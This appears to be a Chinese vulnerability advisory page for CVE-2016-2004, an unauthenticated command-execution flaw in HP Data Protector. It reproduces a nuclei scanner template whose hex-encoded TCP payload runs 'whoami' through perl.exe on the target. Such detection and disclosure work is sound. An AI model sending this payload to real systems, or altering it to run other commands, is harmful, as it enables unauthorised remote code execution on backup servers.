HP Data Protector Arbitrary Command Execution Vulnerability

漏洞信息

漏洞名称: HP Data Protector Arbitrary Command Execution Vulnerability

漏洞编号:

  • CVE: CVE-2016-2004

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: HP Data Protector是一款企业级的数据备份和恢复软件,广泛应用于各种规模的组织中,用于保护关键数据免受丢失或损坏。该软件支持多种操作系统和数据库,是企业IT基础设施中的重要组成部分。此次发现的漏洞允许攻击者通过未指定的向量执行任意代码,这是由于对CVE-2014-2623的不完全修复导致的。具体来说,漏洞的根源在于缺乏适当的身份验证机制,使得攻击者能够绕过安全限制,直接向服务发送恶意命令。这种漏洞的利用可能导致攻击者以Data Protector服务账户的权限执行任意命令,进而可能完全控制系统、窃取敏感数据或中断服务。由于该漏洞不需要用户交互即可被利用,且影响范围广泛,因此被评定为严重级别。企业应立即升级到最新版本的HP Data Protector以防范潜在的攻击。

产品厂商: HP

产品名称: Data Protector

影响版本: before 7.03_108, 8.x before 8.15, and 9.x before 9.06

来源: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2016%2FCVE-2016-2004.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x, NaN@korelogic
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.92734
    epss-percentile: 0.99751
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex
    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 490a0046304402205cb8d4fc530d3448a6fd8ee810f0c3ebf70d1061fecfe0c5b61fcdb60c0f055c02200ddf9aa8fc1921d76c065889e43a4401a29dd6de877e348916bcf601ecfef8bc:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
HP Data Protector Arbitrary Command Execution Vulnerability
http://example.com/2025/07/06/github_922721740/
作者
lianccc
发布于
2025年7月6日
许可协议